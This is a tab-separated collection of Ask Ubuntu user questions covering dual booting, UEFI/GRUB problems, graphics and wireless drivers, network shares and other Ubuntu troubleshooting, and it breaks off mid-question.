474954	efi partition and boot manager - dual boot windows 8 and ubuntu	so , i bought a hp pavilion g6 laptop last year with windows 8 preinstalled and successfully installed ubuntu 13.04 on it . but every time i booted i had to press f9 to enter bios options and then from there i could choose between os boot manager and ubuntu [ i was unable to force grub to take over the windows boot loader ] . now recently i thought of installing ubuntu 14.04 . but what i want in the end is that grub takes on over the windows 8 boot loader and i donot have to press f9 every time i need to boot to ubuntu . i have uefi enabled and secure boot disabled . using the easeus partition manager in windows , i explored the esp [ efi system patition ] . what i found was the following : 1.the partiton has 2 folders - boot and efi . 2.boot has only 1 file - boot.sdi 3.efi has 4 folders - microsoft , boot , hp and ubuntu 4.boot folder here has only 1 file - bootx64.efi , which on searching contents in other folders i found has the same filename as that contained in ./hp/efi/boot/ 5.hp folder has 5 subfolders - systemdiags , biosupdate , bios , boot , efi . the efi folder here has 2 subfolders - boot and microsoft and it is the boot folder which contains bootx64.efi . so , my question is after i have reinstalled ubuntu on a separate partition , will the method given here : windows 8 removes grub as default boot manager , still work and allow me to choose between ubuntu and windows at start-up using grub ? because i remember the last time i tried using it , it did n't work out .. also , out of curiosity , if i somehow remove the hp folder from esp partition , then will this not be the same as having a dos os installed laptop , which now has no remains of hp ? and one thing more if someone can please explain me why is it the case that windows boots by default and ubuntu 's grub can not be started ?
474956	amd graphics drivers	i have a new laptop with dedicated graphics card and i decided i will go with ubuntu 14.04 . all is just fine and i love it but the repos for graphics drivers from canonical are just well ... old .is there any problem if i install my graphics drivers from amd 's official website and not from software updater ? it 's just that from there i get the latest and greatest.i read the realease notes and 14.04 is supported .
474959	allow ftp permissions for every directory	i have a computer that i set up with ubuntu but i do n't have a monitor for it so it is a hassle when i need to change something in the file system because i have to unplug a monitor from one of my computers and plug it into my server . i have vsftpd installed on my ubuntu server and i have access to /var/www/ and i can nagivate to /etc/ but if i try to edit anything i get permission denied . is there a way to give myself permission for every directory or is this a huge security risk ?
474965	install and load uuid-ossp on postgresql	how can i install uuid-ossp extension on postgresql 9.3 ? is it using apt-get install ? i did select * from pg_available_extensions ; but i found no extensions that relates to uuid-ossp .
474966	no longer able to go online with 13.10	bought my computer from ebay , loaded with ubuntu 12.04 or 12.10 . came with a disk with ubuntu 13.10 . i loaded ubuntu 13.10 and called who i purchased computer from . he walked me through setting up ubuntu 13.10 . it worked great until one day i miss typed my password or something else happened , and now i am able to log on with my password , but not able to get online . also i see at the top of the screen , in the dark line , my password listed until i log in . is that normal ? i am a noob to ubuntu , all help is appreciated . thanks .
474968	why do i not have the $ mail environment variable ?	i read that the $ mail shell environment variable is one of the most common ones , and stores the location of my mailbox file , where my emails are stored . i looked into the /var/spool/mail and /var/mail directories , and there are no files or directories in them at all ( checked with cd /var/spool/mail ; ls as well as checking show hidden files under the view menu . yet i have thunderbird mail running and do have mail coming in from my gmail . so my ( related ) question is two-fold - where are my emails kept ? and why is my $ mail environment variable not defined ?
474969	start daemon after specific samba share is mounted	i have a homebrew headless nas running 12.04 . in it i have a bunch of disks that are presented as a samba share thanks to greyhole . if i want to do anything to the files within this share , i must do it through greyhole so that everything is updated properly . thus , the share must be mounted locally and then accessed from there if i want to work on the files from the local machine . i do this mounting automatically thanks to these instructions . i also have deluge installed that takes care of all my torrenting needs . deluge 's default download location is in this share , so that all the downloads are immediately available to the rest of the network . obviously for everything to work , the share must be mounted , otherwise deluge is going to have a problem downloading to it . the problem is , it seems like deluge is starting before the shares are mounted when the system boots . so downloading/seeding does not continue automatically after boot . i have to log in and force a manual rescan and start on each torrent otherwise all the torrents just hangs on the error . is there a way i can make deluge start after the shares got properly mounted ? i looked into upstart 's emits functionality but i can not seem to get it to work properly . any advice ?
474972	how do i get update-notifier to notify updates are available ?	i recently did a fresh install of precise and i noticed that landscape-sysinfo is no longer installed by default . i find the only thing i miss on login is having updates available displayed as part of the motd . i vaguely recall that maybe the current configuration did inform me of security updates and reboot required , but just today i noticed 3 non-security updates available and no notification in the motd .
474975	i installed ubuntu but i want to go back to windows 8	my laptop had windows 8 preinstalled and then i installed ubuntu 14.04 . but now i want to reinstall windows 8 and dual boot the two but i do n't know how to get my product key or get the windows 8 iso file . i heard that windows 8 has the product key in the bios but i do n't know how to access it to download the windows 8 iso file . do i have to purchase another copy of windows 8 in order to do this ?
474983	ubuntu disappeared from my boot screen	i have triple boot ( xp , 7 , ubuntu in wubi ) and today my windows 7 got messed up and request i insert the installation cd and do a repair . when i did the repair , my boot screen got messed up and i no longer have ubuntu to choose to boot from . i have used easybcd to add xp back to the boot screen , but i could n't use it to add ubuntu back .
474984	install fonts for minecraft launcher	i like to play minecraft , and something is annoying me . the launcher is using the default system font , instead of the font it uses on windows 7 and 8 . this is really annoying me , and i could use some help on fixing it .
474986	install website on localhost	i want to install a phpbb forum on my local host , but for that i need get something like iis or xampp , php and sql on my ubuntu . can someone tell me how to do that ? can i also get a tutorial how to chmod spefic files/maps ?
474987	vlc will play a dvd only once then it does nothing	i saw similar questions asked but not like this one . after installing all the codecs necessary to play dvds and the `` css '' command line . here 's what i get . when i boot up and insert a dvd , vlc will open and play it but only one time . if i take out the same dvd and re-insert it i get nothing ! at times i ca n't even open vlc once it has been used , clicking on the icon only makes the icon pulsate but the program never opens . i can not make the disc play using the `` open media '' choice in vlc . after following directions at this link : https : //forum.videolan.org/viewtopic.php ? f=13 & t=70719 all it did was make my sound not work when a dvd does play , but i have sound using other media . i am not a linux expert i am a newbie and do n't know what to try next , other than blowing it out and starting over or just giving up the idea . thank you
474989	copy msi . to install 14.4	i have a vaio laptop ( older ) running ms win xp professional w/ 1.0 gb ram , genuine intel cpu t2400 @ 1.83 ghz.and nvidia geforce go 7400 . had the ubuntu 12.4 it was running great until it asked me to upgrade something and then it locked me out completely . tried to download 12.4 but it would not , so i downloaded the ubuntu 14.4 , i had a difficult time . 14.4 will not install , the error ; can not find copy msi. ? it says to locate it in roxio studio media which is already installed on this computer .
474990	trackpad configuration settings	i am running ubuntu 14.04 on a system76 galago ultrpro . i have not been able to configure the trackpad and get the settings to stick . i am trying to change the sensitivity and palm detection , those settings are not in the system settings mouse page . however , i can configure it pretty well via xinput in a terminal , but the changes are lost whenever i restart . is there some way to make these settings through the gui ? if not which files does the configuration setting go into ?
474998	why is my reported randr version different when connected via xrdp vs remmina	setup linux 3.11.0-22-generic # 38~precise1-ubuntu smp fri may 16 20:47:57 utc 2014 x86_64 x86_64 x86_64 gnu/linux installed xrdp and set `` gnome-session -- session=ubuntu-2d '' in ~/.xsession problem i can connect but attempts to change resolution via system settings result `` randr extension is too old ( must be at least 1.2 ) '' info while connected via xrdp , xrandr -v shows.. xrandr program version 1.4.0 server reports randr version 1.1 while connected via remmina , i get.. xrandr program version 1.4.0 server reports randr version 1.4 question what 's causing this difference and is there a way to get the reported version via xrdp `` corrected '' ?
475000	lynx `` alert ! : unable to connect to remote host . ''	i 'm pretty new to ubuntu server . i 'm running distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 i have installed lynx via sudo apt-get install lynx everything installed fine but when i try to connect to a website it just seems to time out . when i run lynx google.com it goes to a blank screen with a blue line at the bottom . there is yellow text on the line which says '' making http connection to google.com '' but it just sits there . eventually after 5 - 6 minutes it just goes back to the normal terminal window if i run the below on its own lynx i get the same blue line with the same text '' making http connection to google.com '' but after 30 seconds or so it briefly turns to a red line with '' alert ! : lynx unable to connect to remote host '' written on it . i have installed lynx locally and it works fine . does anyone have any ideas ?
475006	how do i record unlimited time with recordmydesktop ?	whenever i record something with recordmydesktop , i encode it , it stops encoding after 42 seconds of video time . it does n't stop at 100 % encoding . i play it and there is 42 seconds of video and the other half is gone . how can i fix this ? i am using the latest version of ubuntu ( crouton ) and the latest version of recordmydesktop . edit : i tried it again , it did n't go past 50 % and stopped encoding automatically . 48 seconds of video . what 's going on ? ! edit # 2 : i found out that it matters on how long you record , how much of the screen you record , video quality , stuff like that . how can i record unlimited time ?
475008	my-weather-indicator inaccurate , not able to select wunder ground in options	i 'm using my-weather-indicator , but it is never accurate ! the wunderground option is disabled and i ca n't select it ! how do i enable it ? i 'm using ubuntu 14.04 lts . and what does `` activate '' mean ?
475009	banshee play queue wo n't add songs and switches to play library	( this might not be the most appropriate place to ask these questions , but i ca n't find any relevant information on my problem anywhere and the primary mean of communicating among banshee-users is a mailing list ... ) i use banshee 2.6.2 on ubuntu 13.10 and have encountered two , possibly unrelated , problems with the play queue extension . the play queue has a function ( called »auto dj« ) where you select a play list and set it up so the queue is filled ( by album , track , year or whatever ) randomly and automatically . however , the queue is not filled properly - it adds an album but then stops . clicking »add more« only works intermittently , possibly only when a few songs remain in the queue . the second problem arises when the queue reaches the end of it 's auto dj-added content ( an album , in my case ) . instead of carrying on playing which i would expect it to ( since there are another album , added by clicking »add more« ) , it starts playing from the library ! anyone knows what 's going on ?
475012	my ubuntu 14.04 does n't maintain the monitor 's resolution i 've set through nvidia driver-xorg.conf	i have a clean installation of ubuntu 14.04 ; i 've also installed the nvidia-driver on my geforce 9800 gt ( v.331.38 , proprietary drivers of ubuntu ) , set the resolution 1280x720 and save it through nvidia x server settings/xorg.conf in x11 directory , as i always did in ubuntu 12.04 and never had problems . but now , whenever i restart the system the resolution turn back to the native resolution of monitor=1920x1080 , but i want the resolution 1280x720 . how to solve this issue ?
475014	upgrade to a new version	i am using ubuntu 10.10 version and want to upgrade to a new version but my update manager said it is not possible what should i do ? please help me . i had tried many times to upgrade it but it always give error about internet connection .
475015	installing ubuntu 14.04 on macbook pro efi	macbook pro : mavericks , 5.2 , graphics : nvidia geforce 9600m i followed the guides from here : https : //help.ubuntu.com/community/uefibooting # detect_.28u.29efi_firmware_processor_architecture and http : //www.rodsbooks.com/ubuntu-efi/ . what i have is the following : /dev/sda apple partitions /boot / ( root ) swap when installing ubuntu , i did not install the boot loader during installation but did so in a chroot environment after installing grub-efi . i installed grub to /dev/sda1 ( efi ) which created the grub64.efi file in efi/ubuntu . this allows the refined boot manager to bring up grub and select ubuntu however , the graphics does not work . even after adding nomodeset and removing quiet/splash from the kernel parameters . any ideas on what could be wrong ? to be clear , if i remove quiet/splash , i can see all the text startup messages being printed out however , the display manager does n't appear to start ( the screen stays black ) . oddly enough though , the ubuntu startup sound can be heard . should have specified this better . as per my answer i was able to get ubuntu to boot with the nvidia drivers however , the one thing happening now is that i am not getting the virtual ttys ( ctr-alt-f [ 1234.. ] ) . attempting to switch to one of these results in a black screen
475018	chrome -- youtube videos upscaling pixelation	i am having issues with youtube videos played in chrome are not being up-scaled smoothly . not all of them all the time , just some of them . this is on ubuntu 14.04 using radeon free driver . i have tried to tweak some rendering related chrome : //flags and i have tried to reset all of the flags back to defaults . neither has helped . i am using xubuntu thus xfce and lightdm . ( i think . ) can this be fixed ?
475019	grub problem after creating new partition - not able to boot live-cd	i 've created a new ntfs partition under windows - after reebooting i 've received the following error : unknown file system entering rescue mode grub rescue > i would 've booted one of my ubuntu live cds , but it wo n't even boot any of those , it hows an idle underscore blinking , and after a while the cd stops running . tried this with 3 different ubuntu live-cds , the system refuses to boot any distribution . does anyone knows how to resolve this ? i 'm not able to format my hard disk , even if i wanted to : (
475020	how to mount mtp device without logging out ?	i have lubuntu 14.04 installed in my laptop . when i plug my xperia m to the laptop , the storages does n't automount . but once i logout and log back in keeping the phone plugged in , it shows both the internal storage and the external memory card of the phone . could somebody please tell me a way so that i do n't have to keeping logging out and logging back in to access my phone memory ? thanks in advance .
475023	how to make vnc server work with ubuntu-desktop without xfce	i have ubuntu server lts 14.04 and i want to know weather it 's possible to install vnc4server and make it work with ubuntu-desktop ( and not xubuntu-desktop ) without installing xfce4 . i think i have to configure the vnc4server configuration file but i 'm a beginner with all this . do n't suggest me any xrdp or gnome-core . i want to run a vnc server using only the original ubuntu-desktop installation . i use vnc viewer to connect to my servers . ( i do n't have any problem if you suggest me something different than vnc4server if it 's going to work with ubuntu-desktop ) thanks .
475025	makemkv setup error	when i run sudo bash configure ( ./configure does n't work ) , i get this : checking whether we are cross compiling ... configure : error : in /media/pitaj/shared/documents/makemkv/makemkv-oss ' : configure : error : can not run c compiled programs . if you meant to cross compile , use -- host ' . see `config.log ' for more details in console.log , it says that gcc -v is n't valid i 'm following this tutorial : http : //www.makemkv.com/forum2/viewtopic.php ? f=3 & t=224
475027	can not connect to windows share	i 've been going through and pouring over resource for the past few hours and i can not get my box to connect to my friends network drive . my friend does n't use linux , but he 's setup the network share like this : dpr : \\name\images and he 's given me the username and password which i 've verified is correct . it is located on 192.168.0.2 sudo mount -t cifs -o username=*** , password=*** //name/images /media/name/ sudo mount.cifs //192.168.0.2/name/images /media/name/ -o credentials=~/name.credentials ( i 've confirmed that ~/name.credentials does have the correct credentials as well ) regardless of what i attempt i get mount error ( 13 ) : permission denied refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) i 'm not sure what i 'm doing wrong , but it 's probably really simple and stupid . thanks to any/all in advance . edit : i do n't know if this helps , but i 'm running ubuntu 14.04 .
475028	how may i deactivate the touchpad under ubuntu 14.04 ?	i 'd like to deactivate the touchpad permanently . ( btw : this should be included in the ubuntu-settings . )
475030	ubuntu 14.04 lts boot-repair error	i always like to start by apologizing just in case this is a duplicate question , but i do n't really know what to ask , so i do n't know what to look for . with that being said , i 'm running a lenovo v570 with 16gb of ram and a 750gb hdd and want to run a single os ( no dual boot with windows ) . i was running 12.04 lts with no problem , but now that i 'm trying to upgrade to 14.04 lts it seems that i ca n't boot my computer . i am installing the os from a dvd which i burned using the 64-bit *.iso file . when i start it up i get an error `` could not open efi\boot\fallback.efi : 14 '' and then it brings up the grub menu for me to try ubuntu without installing , install ubuntu , etc . i have successfully install ubuntu but since it 's not working , i boot into the trial version of ubuntu and have run the boot repair per the accepted answer in this question : ca n't find boot-repair package for the newest version of ubuntu looking at the grub options , it does show the efi option and it is ticked , so i believe it 's doing what it 's supposed to be doing and not installing in legacy mode . after the boot repair finishes , though , it tells me there 's an error and gives me this link : http : //paste.ubuntu.com/7561289/ i 'm not sure what to do with that information , though , because i 'm not overly savvy with this kind of stuff . can anyone help with why i ca n't seem to boot after installing 14.04 lts ? as always , thanks for the help !
475035	btrfs for deduplication and compression at the same time ?	i 'm thinking about using btrfs functions for both deduplicate and compress my storage ... my question is : is it efficient ? i mean , does it deduplicate and compress at the same time efficiently ? ! i 'm using ubuntu 14.04 64-bit . also , i 'm planning to use it with raid0 on top of ebs-optimized volumes in a cloud computing environment ... tks ! thiago
475040	network computer 's ?	i 'm connected by wifi connection with some network and this network uses more than router to connect with other more pcs by cables ( lan connections ) , and i only see all the connected pcs with same router that i 'm connected with , i do n't see the rest of computers connected to other routers . so is there a way to see all the connected pcs to the same network ?
475043	looking for an open source property management system	iâm looking for an open source property management system i can run in ubuntu that can help me keep track of apartments and cottages , the tenants and some things like that .
475044	network manger keeps crashing ubuntu 14.04	hi i just upgraded from 12.04 everything went fine at first but after installing gnome-session-flashback to system monitor and notifications applets in the task bar kept crashing now wont load at all which means i can not connect to a network or edit connection setting . i was wondering if anyone had a solution for this or if there was a way to boot connection manger from a terminal . thanks
475045	serious system problem in 14.04	two months ago ubuntu did a normal update check and installed a number of updates , since then i have a red stop sign in the notification area , and i get constant error messages , i check report problem every time i saw a error message , but it 's been two months and i got no answer back so i assumed it 's not even sending the error reports anymore . i ca n't even open the update centre anymore . when i open the stop sign menu it reads : an error occurred , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : ' error : opening the cache ( e : encountered a section with no package : header , e : problem with mergelist/var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trustyupdates_universe_i18n_translation-en , e : the package lists or status file could not be parsed or opened. ) ' . this usually means that your installed packages have unmet dependencies . and below the error message it has these options , show updates , install all updates , check for updates , start package manager , show notifications , preferences . can you help me fix this problem ? do i have to reinstall the whole os ? i would appreciate any help . thank you .
475049	in 14.04 ubuntu should there be in the application menu-system some kind of scanner setting ?	i ca n't get the computer to see a scanner when it boots up . it 's a dual boot in xp and scanner works fine in xp . canoscan 5600f bios = phoenix tech ver . 6.00pg mb = via tech inc. pm800 8237 intel celeron 2.93ghz
475052	dual boot installation problem	i have an ( way ) older machine . it has a 400 mhz processor , 1.5 gigabytes of memory and a 60 gb ide hard drive . i am connected to 10/100 lan . i am using a dvd install disk ( downloaded for the internet - latest version ) i have selected the dual boot i have reached the `` install '' screen which shows the dual partition for win xp and ubuntu . 28.8 gb for xp and 31.2 gb for ubuntu . it has been 24 hours ( yes 24 hours ) - when i move the cursor over the partition display , the arrow flickers . 4 0f the 6 dots are colored orange . the only thing i can select is quit . the back and install buttons are grey '' out '' . if i select quit , it asks for confirmation . can anyone tell me whats is happening , or supposed to happen . what am i supposed to see to indicated i am proceeding normally .
475053	partition table lost - how to recover lost luks partition , i have some backup partitioning data	thanks for choosing to take a look and help . the problem is this : i have a 1tb external hard disk with one encrypted partition ( about 286 gb ) - luks ( i 'll call this ep ) one unencrypted partition ( about 580 gb ) . - ntfs ( i 'll call this uep ) the rest of the partitions were empty so they do n't matter . i changed the uep to `` read only '' in windows using `` diskpart attributes volume set readonly '' . it seemed to work fine without issues , but after a short while there was some error and my partition table went missing partition manager said the whole drive was unalocated . so too did gparted and fdisk . i tried using testdisk and it found all the missing partitions , when i wrote the recovered partition to disk , the uep returned fine , but the encrypted partition is now inexplicably downsized to 2mb . fortunately i did some partition data backup earlier when i was trying to convert this from guid to mbr , before all this and have some sector data which may help in recovery . the pre-crash data created by partition wizard is here ( line 37/39 are the partitions i speak of ) . the post-crash data is here ( noticeably start of 37 and end of 39 match the luks partition from the pre-crash data ) the luks partition is this one : letter : * partid : 7 start : 137117696 end : 737118207 size : 600000512 fsid : 255 label : clustersize : -1 freesectors : 0 primary : 1 bootable : 0 bootvolume : 0 systemvolume : 0 is there any way to recover the luks partition while also keeping the 580 gb ntfs drive ? i only need to recover the two drives that i have discussed here . please help me out with this . -danish
475055	huawei k3565 usb modem problem	issue starts when i want o install kannel and connect it to a usb modem ( huawei k3565 ) to receive sms and send sms . commands and result : # lsusb the device exist 'huawei modem' # wvdialconf /etc/wvdial.conf the device exist at ttyusb0 found a modem on /dev/ttyusb0 but when run minicom the result is # minicom # minicom : can not open /dev/modem : no such file or directory # ln -l /dev/modem # ln : accessing '/dev/modem ' : no such file or directory now trying to connect the modem to the ttyuab using : # ln -s /ttyusb0 /dev/modem # ln : failed to create symbolic link '/dev/modem ' : file exists really i 'm confused and do not to know why this issue showed up , and how can i solve it and connect my modem to the server . appreciate your support in advance .
475057	how to install python from the tar.xz	i 've downloaded the latest version of python from their website , but i 'm not exactly sure as to how to install from the tar.xz . i 've extracted it to the downloads folder , but it leaves me with a folder with more folders inside . what do i do ?
475059	trying to launch from usb - `` could not retrieve the required installation files ''	let me just say i am totally new to linux . i 'm a basic windows user . i am trying to launch ubuntu from a usb so i do n't have to install on my laptop . i used pendrivelinux to save it my usb , and then launch it from there by clicking on `` wubi '' . it then takes me to the demo/full install menu , i click on the `` help me to boot from cd '' , it loads and extracts the files but i get an error message after that says to view a log `` appdata\local\temp\wubi-14.04-rev286.log '' any information would be helpful , thanks .
475060	install menu wrong resolution so ca n't continue	using a minimal cd on a 2002 medion laptop this happens : blank screen apart from a _ in the top left . type `` cli '' ( text does n't appear on screen ) it eventually gets to the install menu but the resolution is wrong so most of the menu ca n't be seen . the laptop res is 1024x768 . any ideas ? it 's a 2gig pentium p4 with 512mg and a 20gb hd - so if anyone has any ideas about reviving it i 'd be grateful . if i should just bin it then be honest ... ( it 's kept in a spare room for guests to use , but now xp is too dangerous now ... ) edit : it 's the minimal cd version on this page https : //help.ubuntu.com/community/installation/minimalcd `` ubuntu 14.04 `` trusty tahr '' minimal cd 31mb* ( md5 : a2502844750ecb6477d8fb4ff6b9aaf8 , sha1 : d17c34ce716f13396040ccdc02d32482ed6b01a1 ) ''
475061	extension items are grayed out , and there is no on/off slider button for extensions.gnome.org	when i go to extensions.gnome.org , all of the extensions are greyed out and there is no on/off slider in any of them . another weird thing is that the reviews fail to load . i am on gnome 3.9.90 , with ubuntu 14 . i am using firefox , and do not have the gnome shell integration plug-in enabled . please help !
475062	problem installing ubuntu with windows 8.1 through wubi	i tried installing ubuntu using wubi and everything was shown correctly , no errors of any sort . but the moment the boot process started after installing it , several errors appears . how can i solve this without having to use a dvd or usb , -- original -- cuando instalo ubuntu con wubi , no aparece ningún error , cuando reinicio para terminar la instalación , todo parece normal , termina de configurar y todo eso normal , pero cuando ya esta iniciando sesión me aparece `` se encontraron errores serios al comprobar la unidad de disco / '' y no he podido encontrar solución al problema , alguien me podría decir porque sucede eso ? y como lo evito , que no sea utilizando un dvd/usb ... . gracias !
475063	how do i get suspend working on a toshiba satellitle c55-d ?	i have a rather new model of a toshiba satellite c55-d with amd e-1 processor with 4gb ram and a 500 gb hdd and im running trusty tahr 14.04 ubuntu . it acts like it will want to go to sleep when i press suspend but it immediately wants to get awake from suspend and i have power options set right too .
475066	unable to view theme folders when moving them to usr/share/themes	i 've been transferring theme folders i 've downloaded via the terminal to usr/share/themes . some have transferred just fine , others appear to be locked after they finish transferring . the ones that are lock say i do n't have permission to view . can anyone tell me why this might be ? this is an example of the code i have been using sudo cp -rv ~/desktop/ink-master /usr/share/themes i am on ubuntu 14 .
475068	how do i install a realtek wireless-n usb adapter on my linux os laptop	i just bought a realtek wireless-n usb adapter and i 'm having problems installing it to my linux os laptop . it will not run the setup.exe . it is a ultra-mini usb wireless lan 802.11n adapter - 1t1r and i bought it at monoprice.com . where can i go to and download the proper driver ?
475070	ssd is not showing up in boot loader installation device list while installing ubuntu 14.04 alongside windows	i 've windows 7 installed in my ssd and trying to install ubuntu 14.04 in same ssd drive . but when i try to install ubuntu alongside windows it shows only hdd in the drive selection list . if i try to manually select sdd as boot loader installation device an error message is shown `` no root file system is defined '' , although i chose sda1 as boot loader . note that i 'm not using raid array in ssd .
475072	ca n't access computer	i 'm running ubuntu 14.04 on an intel nuc and it wo n't boot ! the last successful boot was earlier today but now each time i try it gets stuck on the grub menu where it prompts for memory check etc . this is not a dual boot system , so this screen should n't ever appear , and it never has before . it 's grub version 2.02~beta2-9 , which is a little disconcerting , as i 'm on the stable sources . unfortunately the keyboard ( i 've tried 2 keyboards just in case ) is not responding at this point in the boot process , so i ca n't select the `` ubuntu '' menu option in grub . the keyboard works during the bios stage , so i can configure it to boot from usb , and i tried a flash drive with 14.04 on it . the flash drive works in my laptop but is completely ignored by the nuc ( i tried all 3 usb ports ! ) . it seems that i have no way of getting into the machine at all ! the intel support site was my first option , but the site is down . i expect it 's a long shot , but if anyone has any ideas i 'd be very grateful .
475073	ubuntu server performance boost	is there any way to boost an ubuntu server 's performance ? i feel it a bit laggy when hosting a game server on it , unlike other servers . do you think installing a desktop environment will decrease the server 's performance ? currently i only have an ftp service installed , nothing else . ( i use ssh to connect to it . ) vm specs : ⠀os : ubuntu server 14.04 ⠀cpu : dual core 2.13ghz ( 2 processors ) ⠀ram : 4gb ⠀disk : 40gb
475075	ar9485 wireless card loses ability to connect after hibernation	this has happened twice now , the first time it happened i just reinstalled ubuntu . the only things that i 've been messing with in terms of networking , have been restarting the network-manager service after i resume from hibernate ( because it never works right after resume , but restarting the service fixes that ) , and changing my mac address with ifconfig wlan0 down & & ifconfig wlan0 hw ether 11:22:33:44:55 & & ifconfig wlan0 up . using tail | dmesg returns a bunch of attempts to connect , saying something like authenticating ... okay you 're connected ! now i 'm going to just disconnect because i feel like it . ( reason=3 ) . any ideas ? if it helps maybe i 'll add a picture of the tail|dmesg output later . my wireless drivers are as follows : atheros ar9485 wireless network adapter hamachi network interface microsoft virtual wifi miniport adapter realtek pcie gbe family controller virtualbox host-only ethernet adapter here is a pastebin of some terminal outputs that could help . also , the reddit thread has a few answers , for anyone curious . it 's located here . it is entirely possible that it 's just my school wifi blocking out my laptop , and my home wifi sucks . wifi does work at places other than my home and school , however my phone can connect to both places . here is a pastebin of the results of the wireless-info script .
475078	brightness fn key adjustment problems	my brightness function key controls work after setting grub boot parameter to `` acpi_osi= '' but using them i can not adjust the brightness higher than around 70 % ( there is empty bar left over and i ca n't adjust higher ) unless i go to brightness & lock settings manually than i can use the slider to adjust it higher ... i primarily use intel_backlight to adjust my backlight and i am running linux kernel 3.14.1 on ubuntu 14.04 lts on an asus x550la laptop when i try : cd /sys/class/backlight/intel_backlight cat max_brightness 937 cat brightness 811 it seems that i can only adjust to a maximum of 811 using the fn brightness controls if i instead do cd /sys/class/backlight/acpi_video0 cat max_brightness 10 cat brightness 4 cat actual_brightness 10 with the fn keys actual_brightness is not equal to the value returned from brightness on acip_video0 ( which is always 4 ) but on intel_backlight actual_brightness = brightness the adjustment problem seemingly arises because both intel_backlight and acpi_video0 are trying to adjust brightness
475081	how to create a launcher to execute a terminal command ?	for example , this terminal command : ping www.google.com so my question is how can i create a launcher in my desktop can do this command , so there is no longer needs to open terminal every time and write this it .
475084	connecting ubuntu home server to internet via laptop	i recently got a spare desktop computer from a relative to play around with and since i 've been using ubuntu for a few years i decided to install ubuntu server 12.04 to play around with and learn more . however it does n't have a wireless card , the wireless adapter had a shipping error and will be awhile , and plugging it into the router is not an option . so i figured i could give it access to the wifi from my laptop ( which i switch between windows and ubuntu ) so i could at least get some things started and set up while i 'm waiting for the adapter . however the few guides i can find to do that require a gui , something lacking on the server version . could someone tell me how to set this up via the terminal ? i would appreciate it .
475086	lubuntu wireless not works at acer aspire 1410	i have an old notebook acer aspire 1410 . previously , i installed ubuntu 14.04 lts , wireless works perfectly . currently , i installed lubuntu 14.04 lts but the wireless does not work . ping www.google.com ping : unknown host www.google.com btw : when i try lubuntu without installation , i can connect the wireless successfully .
475088	broken splash boot screen with significant performance and freezing issues	okay heres the story and yes this is important becauses its what was the last thing i did before this madness watched a youtube video which ive now flagged and reported but he basically instructed us to su virtualbox into the system i dont know what i did all i did was follow directions now im plagued with no ubuntu purple boot screen it goes straight to a black screen filled with letters and im experiencing more lag and freezing than i ever have before this is not from an upgrade ive had 14.04 for about a month before this happened im at a loss for what my routes are it was all i could do to remove the superblocks just to get back into my desktop please help
475090	lubuntu wireless issue with broadcom chipset	i 'm a web dev that just started a new venture in buying wiped laptops in bulk and selling them at a low cost to lower income families that want a laptop that will simply preform and not become virus ridden and require constant maintenance , so naturally i opted for a linux distro and after some research , lubuntu was my top pick . i 'm not a stranger to linux as all of my servers for my web dev business are linux , but i am however new to l/ubuntu and i 'm having some issues with both wifi ( broadcom chipsets ) on the 20 or so dells that i have right now , d800 's , d810 's and e5400 's . not sure if you can point me in a solid direction , i 've scoured ( and implemented ) the suggestions on ask ubuntu and still coming up short . on one of the e5400 's ( though they all seem to suffer the same errors ) i got the following : dell-latitude-e5400 @ dell-latitude-e5400 : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions . dell-latitude-e5400 @ dell-latitude-e5400 : ~ $ lspci 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 02 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 92 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 2 port sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 02 ) 00:1f.5 ide interface : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 2 port sata controller [ ide mode ] ( rev 02 ) 02:01.0 cardbus bridge : ricoh co ltd rl5c476 ii ( rev ba ) 02:01.1 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 04 ) 02:01.2 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 21 ) 09:00.0 ethernet controller : broadcom corporation netxtreme bcm5761e gigabit ethernet pcie ( rev 10 ) dell-latitude-e5400 @ dell-latitude-e5400 : ~ $ rfkill usage : rfkill [ options ] command options : -- version show version ( 0.5-1ubuntu1 ( ubuntu ) ) commands : help event list [ identifier ] block identifier unblock identifier where identifier is the index no . of an rfkill switch or one of : < idx > all wifi wlan bluetooth uwb ultrawideband wimax wwan gps fm nfc [ code ] dell-latitude-e5400 @ dell-latitude-e5400 : ~ $ lspci -nn | grep 0280 dell-latitude-e5400 @ dell-latitude-e5400 : ~ $ lsusb bus 002 device 002 : id 05dc : a811 lexar media , inc. 16gb gizmo ! bus 002 device 001 : id 